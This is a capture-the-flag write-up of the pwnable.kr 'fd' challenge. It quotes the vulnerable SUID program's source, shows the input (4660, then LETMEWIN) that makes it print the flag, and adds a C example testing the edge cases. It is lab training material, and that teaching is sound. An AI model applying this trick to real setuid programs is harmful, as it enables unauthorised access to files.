Hyunseung Ha

[pwnable.kr] fd writeup

ls -al
total 40
drwxr-x---   5 root   fd   4096 Oct 26  2016 .
drwxr-xr-x 116 root   root 4096 Nov 11  2021 ..
d---------   2 root   root 4096 Jun 12  2014 .bash_history
-r-sr-x---   1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--   1 root   root  418 Jun 11  2014 fd.c
-r--r-----   1 fd_pwn root   50 Jun 11  2014 flag
-rw-------   1 root   root  128 Oct 26  2016 .gdb_history
dr-xr-xr-x   2 root   root 4096 Dec 19  2016 .irssi
drwxr-xr-x   2 root   root 4096 Oct 23  2016 .pwntools-cache

The file we want to read is flag, and only its owner, fd_pwn, or the root user can read it.
But we are the fd user now.
So we need to act as fd_pwn to get the required permission.
The fd binary is SetUID to fd_pwn, so we can use it to gain access.

Look at the source file:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
    if(argc<2){
        printf("pass argv[1] a number\n");
        return 0;
    }
    int fd = atoi( argv[1] ) - 0x1234;
    int len = 0;
    len = read(fd, buf, 32);
    if(!strcmp("LETMEWIN\n", buf)){
        printf("good job :)\n");
        system("/bin/cat flag");
        exit(0);
    }
    printf("learn about Linux file IO\n");
    return 0;

}

We have to pass a number as the argument. The program subtracts 0x1234 from it to get fd, so if the argument equals 0x1234, fd = 0 and read() takes its input from standard input (the keyboard). We can then set buf to LETMEWIN via standard input.
atoi parses decimal, and 0x1234 is 4660 in decimal, so run the following command to get the desired result:

./fd 4660
LETMEWIN
good job :)
_FLAG_
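
The two checks in fd.c, restated as an added example (not the challenge's source and not the author's code) so the edge cases can be tested: the argument has to be decimal, the trailing newline matters, and a bad descriptor makes read() fail. The names `fd_from_arg`, `check_fd` and `check_input` are made up here, and a pipe stands in for the keyboard on descriptor 0.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Same arithmetic as fd.c. atoi() parses decimal only and stops at the
   first non-digit, so "0x1234" yields 0, not 4660. */
int fd_from_arg(const char *arg) {
    return atoi(arg) - 0x1234;
}

/* Same comparison as fd.c, on a zeroed local buffer (fd.c relies on its
   zero-initialised global buf to terminate the string after read()).
   Returns 1 on match, 0 on mismatch, -1 if read() fails. */
int check_fd(int fd) {
    char buf[32] = {0};
    ssize_t len = read(fd, buf, sizeof buf);
    if (len < 0)
        return -1;
    return strcmp("LETMEWIN\n", buf) == 0;
}

/* Constructed helper (assumption of this example): send `input` through a
   pipe and run the check on the read end, as if it had been typed on stdin. */
int check_input(const char *input) {
    int p[2];
    if (pipe(p) != 0)
        return -1;
    if (write(p[1], input, strlen(input)) < 0) {
        close(p[0]);
        close(p[1]);
        return -1;
    }
    close(p[1]);
    int r = check_fd(p[0]);
    close(p[0]);
    return r;
}

int main(void) {
    printf("4660   -> fd %d\n", fd_from_arg("4660"));
    printf("0x1234 -> fd %d\n", fd_from_arg("0x1234"));
    printf("with newline:    %d\n", check_input("LETMEWIN\n"));
    printf("without newline: %d\n", check_input("LETMEWIN"));
    printf("invalid fd:      %d\n", check_fd(fd_from_arg("0x1234")));
    return 0;
}
```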